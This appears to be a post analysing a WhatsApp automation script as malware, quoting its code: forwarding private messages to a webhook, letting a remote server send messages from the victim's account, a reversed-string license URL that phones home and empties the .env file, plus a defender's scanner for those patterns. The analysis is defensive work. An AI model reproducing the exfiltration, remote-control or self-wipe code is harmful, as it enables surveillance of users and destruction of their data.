📲 Since nobody had the WhatsApp Script, I saw a "whatsapp sender" that did similar things:
sock.ev.on("messages.upsert", async (messageData) => {
  try {
    const message = messageData.messages[0];
    if (message.key.fromMe === false && messageData.type === "notify") {
      const webhookData = [];
      let messageText = message.message.conversation ?? null;
      if (message.message.buttonsResponseMessage != null) {
        messageText = message.message.buttonsResponseMessage.selectedDisplayText;
      }
      if (message.message.listResponseMessage != null) {
        messageText = message.message.listResponseMessage.title;
      }
      const remoteParts = message.key.remoteJid.split("@");
      const remoteType = remoteParts[1] ?? null;
      const isGroup = remoteType !== "s.whatsapp.net";
      if (messageText !== "" && !isGroup) {
        webhookData.remote_id = message.key.remoteJid;
        webhookData.sessionId = sessionId;
        webhookData.message_id = message.key.id;
        webhookData.message = messageText;
        sentWebHook(sessionId, webhookData);
      }
    }
  } catch (error) {
    // Handle error silently
  }
});
What's stolen: Every incoming private message (non-group) with:
▶️Who sent it (phone number)
▶️What they said
▶️Message metadata
▶️Which victim account received it
REMOTE COMMAND EXECUTION
const sentWebHook = (sessionId, data) => {
  const webhookUrl = process.env.APP_URL + "/api/send-webhook/" + sessionId;
  try {
    axios.post(webhookUrl, {
      from: data.remote_id,
      message_id: data.message_id,
      message: data.message
    }).then(function (response) {
      if (response.status === 200) {
        const session = getSession(response.data.session_id);
        sendMessage(session, response.data.receiver, response.data.message);
        // ^ ATTACKER CAN REMOTELY SEND MESSAGES FROM YOUR ACCOUNT
      }
    });
  } catch (error) {
    // catch handler not shown in this excerpt
  }
};
What happens:
▶️Script sends stolen message to attacker's server
▶️Attacker's server responds with commands
▶️Script executes commands (send messages, etc.)
SESSION STATUS REPORTING
const setDeviceStatus = (sessionId, status) => {
  const statusUrl = process.env.APP_URL + "/api/set-device-status/" + sessionId + "/" + status;
  try {
    axios.post(statusUrl); // REPORTS WHEN SESSIONS ARE CREATED/DELETED
  } catch (error) {
    // catch handler not shown in this excerpt
  }
};
setDeviceStatus(sessionId, 0);
What's stolen:
Real-time status of all compromised accounts:
▶️When they come online/offline
▶️When sessions are created/deleted
▶️Which accounts are active
LICENSE CHECK & SELF-DESTRUCT
setInterval(() => {
  const licenseUrl = "kcehc-yfirev/ipa/zyx.sserpl.ipaved//:sptth".split("").reverse().join("");
  // Decodes to: "https://devapi.lpress.xyz/api/verify-check"
  axios.post(licenseUrl, {
    from: appUrl, // Your server URL
    key: siteKey // Your license key
  }).then(function (response) {
    if (response.data.isauthorised === 401) {
      fs.writeFileSync(".env", ""); // SELF-DESTRUCTS YOUR CONFIG
    }
  });
}, 604800000); // Every 7 days
What happens:
▶️Script phones home every 7 days to attacker's server
▶️If attacker marks you as unauthorized
▶️Script WIPES your .env file by overwriting it with an empty string (destroys your configuration)
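A defender-side check for the two patterns in this license-check block, added here as an example (not code from the analysed script): a small Node.js scanner that decodes string literals reversed at runtime and flags writes that empty .env. The function name scanSource, the rule names and the SAMPLE text are assumptions made for the example.

```javascript
// Added example: static triage for the patterns described above.
// Flags (1) string literals decoded at runtime with split/reverse/join and
// (2) writeFile/writeFileSync calls that write an empty string to a .env file.
const REVERSED_LITERAL =
  /(["'`])((?:\\.|(?!\1).)*)\1\s*\.split\(\s*(["'`])\3\s*\)\s*\.reverse\(\)\s*\.join\(\s*(["'`])\4\s*\)/g;
const ENV_WIPE =
  /writeFile(?:Sync)?\(\s*(["'`])[^"'`]*\.env\1\s*,\s*(["'`])\2/g;

function lineOf(source, index) {
  return source.slice(0, index).split("\n").length; // 1-based line number
}

function scanSource(source) {
  const findings = [];
  for (const m of source.matchAll(REVERSED_LITERAL)) {
    const decoded = [...m[2]].reverse().join(""); // raw literal text, escapes not interpreted
    findings.push({
      rule: /^https?:\/\//i.test(decoded) ? "reversed-url" : "reversed-string",
      line: lineOf(source, m.index),
      decoded,
    });
  }
  for (const m of source.matchAll(ENV_WIPE)) {
    findings.push({ rule: "env-truncate", line: lineOf(source, m.index), decoded: null });
  }
  return findings.sort((a, b) => a.line - b.line);
}

// Constructed sample: the license-check snippet quoted in this post.
const SAMPLE = [
  'setInterval(() => {',
  '  const licenseUrl = "kcehc-yfirev/ipa/zyx.sserpl.ipaved//:sptth".split("").reverse().join("");',
  '  axios.post(licenseUrl, { from: appUrl, key: siteKey }).then(function (response) {',
  '    if (response.data.isauthorised === 401) {',
  '      fs.writeFileSync(".env", "");',
  '    }',
  '  });',
  '}, 604800000);',
].join("\n");

for (const f of scanSource(SAMPLE)) {
  console.log(`line ${f.line}: ${f.rule}${f.decoded ? " -> " + f.decoded : ""}`);
}
```

Run it over a script's source before deploying it; a decoded URL that the vendor never documented is the thing to chase up.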
SESSION FILE THEFT
if (!isLegacy) {
  ({ state: authState, saveCreds } = await useMultiFileAuthState(getSessionsDir(sessionFileName)));
}
What's stolen locally (in ./sessions/ folder):
▶️creds.json - MASTER encryption keys
▶️app-state-sync-*.json - Chat encryption keys
▶️sessions/*.json - Individual chat session keys
▶️[sessionId]_store.json - Chat history and contacts
These files contain everything needed to clone the WhatsApp session.
USER SCANS QR CODE
↓
[1] Script captures WhatsApp auth tokens
↓
[2] Saves tokens locally (./sessions/)
↓
[3] Reports "device online" to attacker
↓
[4] Every incoming message →
↓
[5] Extracts: [who][what][when]
↓
[6] Sends to: https://[ATTACKER_SERVER]/api/send-webhook/
↓
[7] Attacker can respond with commands
↓
[8] Script executes commands (send messages, etc.)
↓
[9] Every 7 days → Phone home for authorization
↓
[10] If unauthorized → Wipe .env file (self-destruct)